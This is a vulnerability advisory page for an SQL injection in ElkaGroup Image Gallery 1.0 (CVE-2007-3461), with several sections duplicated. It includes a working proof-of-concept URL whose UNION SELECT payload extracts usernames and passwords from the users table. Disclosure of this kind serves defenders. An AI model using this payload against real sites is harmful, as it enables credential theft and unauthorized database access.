ElkaGroup Image Gallery Property.PHP SQL Injection Vulnerability
BID:24666
Info
ElkaGroup Image Gallery Property.PHP SQL Injection Vulnerability
| Bugtraq ID: | 24666 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3461 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 27 2007 12:00AM |
| Updated: | May 07 2015 05:37PM |
| Credit: | t0pP8uZz & xprog is credited with the discovery of this vulnerability. |
| Vulnerable: |
Elkagroup Image Gallery 1.0 |
| Not Vulnerable: | |
Discussion
ElkaGroup Image Gallery Property.PHP SQL Injection Vulnerability
Elkagroup is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects Elkagroup 1.0; other versions may also be affected.
Elkagroup is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
This issue affects Elkagroup 1.0; other versions may also be affected.
Exploit / POC
ElkaGroup Image Gallery Property.PHP SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available.
http://www.example.com/SCRIPT_PATH/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users
Attackers can use a browser to exploit this issue.
The following proof-of-concept URI is available.
http://www.example.com/SCRIPT_PATH/property.php?cid=9&uid=0&pid=-1%20UNION%20ALL%20SELECT%201,2,3,4,5,6,7,concat(username,0x3A,userpassword),9,10,11,12,13,14,15,16,17%20from%20users
Solution / Fix
ElkaGroup Image Gallery Property.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
ElkaGroup Image Gallery Property.PHP SQL Injection Vulnerability
References:
References:
- Elkagroup Image Gallery Homepage (Elkagroup)